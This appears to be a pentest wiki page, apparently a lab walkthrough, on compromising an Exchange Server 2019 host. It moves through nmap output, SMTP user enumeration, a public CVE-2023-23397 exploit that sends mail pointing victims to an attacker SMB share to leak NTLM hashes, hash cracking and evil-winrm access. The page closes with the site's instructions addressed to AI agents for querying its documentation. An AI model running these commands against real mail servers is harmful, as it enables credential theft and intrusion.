# OWA Exchange Server 2019

## Nmap

```shell
nmap -p- -A <IP> -oA myHost                                     
Starting Nmap 7.93 ( https://nmap.org ) at XXX EDT
PORT      STATE SERVICE              VERSION
25/tcp    open  smtp                 Microsoft Exchange smtpd
| smtp-commands: ad.domain Hello [10.10.16.158], SIZE, PI

53/tcp    open  domain               Simple DNS Plus
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: 403 - Forbidden: Access is denied.
88/tcp    open  kerberos-sec         Microsoft Windows Kerberos (server time: XXXX-XX)
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
389/tcp   open  ldap                 Microsoft Windows Active Directory LDAP (Domain:DOMAIN
| 
443/tcp   open  ssl/https
| 
444/tcp   open  snpp?
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
465/tcp   open  smtp                 Microsoft Exchange smtpd
|     
587/tcp   open  smtp                 Microsoft Exchange smtpd

| 
|_  Product_Version: 10.0.17763
593/tcp   open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
|
| 
717/tcp   open  smtp                 Microsoft Exchange smtpd
|
808/tcp   open  ccproxy-http?
890/tcp   open  mc-nmf               .NET Message Framing
1801/tcp  open  msmq?
2103/tcp  open  msrpc                Microsoft Windows RPC
2105/tcp  open  msrpc                Microsoft Windows RPC
2107/tcp  open  msrpc                Microsoft Windows RPC
3268/tcp  open  ldap                 Microsoft Windows Active Directory LDAP (Domain: DOMAIN., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=DOMAIN
| Not valid before: X
|_Not valid after:  X
| rdp-ntlm-info: 
|   Target_Name: DOMAIN
|   NetBIOS_Domain_Name: DOMAIN
|   NetBIOS_Computer_Name: DOMAIN
|   DNS_Domain_Name: DOMAIN
|   DNS_Computer_Name: DOMAIN
|   DNS_Tree_Name: DOMAIN
|   Product_Version: 10.0.17763
|_  System_Time: XXX
3875/tcp  open  msexchange-logcopier Microsoft Exchange 2010 log copier
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6001/tcp  open  ncacn_http           Microsoft Windows RPC over HTTP 1.0
6067/tcp  open  msrpc                Microsoft Windows RPC
...
64327/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
64337/tcp open  mc-nmf               .NET Message Framing

```

## OWA - HTTPS 443

<https://github.com/kh4sh3i/exchange-penetration-testing.git>

```
git clone https://github.com/kh4sh3i/exchange-penetration-testing.git


cd exchange-penetration-testing 
                                                                                                                               
                                                                             
python3 get_exchange_version.py https://10.129.229.14                                         

Build number:15.2.1118
Exchange Server 2019


```

### SMTP

<https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true>

```
wget https://github.com/danielmiessler/SecLists/blob/master/Usernames/xato-net-10-million-usernames.txt?raw=true

smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./xato-net-10-million-usernames.txt


smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt

└─# smtp-user-enum -M RCPT -D ad.domain -t 10.129.229.14 -U ./users.txt
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... ./users.txt
Target count ............. 1
Username count ........... 8295455
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ <DOMAIN>

######## Scan started at Thu XXX #########
10.129.229.14: valdaccount@DOMAIN exists
```

## CVE-2023-23397

{% embed url="<https://github.com/BronzeBee/cve-2023-23397>" fullWidth="false" %}
CVE-2023-23397
{% endembed %}

```
git clone https://github.com/BronzeBee/cve-2023-23397.git

┌──(kali㉿kali)-[/HTB/OWA/cve-2023-23397]
└─$ python cve-2023-23397.py -s 10.129.229.110 -f fromemail@email -t toemail@email -p '\\10.10.16.158\test'
[*] CVE-2023-23397 exploit
[*] Author: @bronzebee

[*] Connecting to 10.129.229.110:25
[*] Sending message to discovered@validaccount.domain
[*] Message sent to all addresses successfully
[*] Total messages sent: 1/1
```

The exploit requires first SMB server running (impacket)

`impacket-smbserver -smb2support share .`

![](/files/mkO6UzawFO3Z3QcNY1Ni)

## John the Ripper - crack NTLM hash

`john --wordlist=/usr/share/wordlists/rockyou.txt hash`

## WinRM - TCP 5985

```
evil-winrm -i 10.129.229.14 -u validaccount -p 'password'
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/infra-pentesting/active-directory-ad-initial-attacks/owa-exchange-server-2019.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.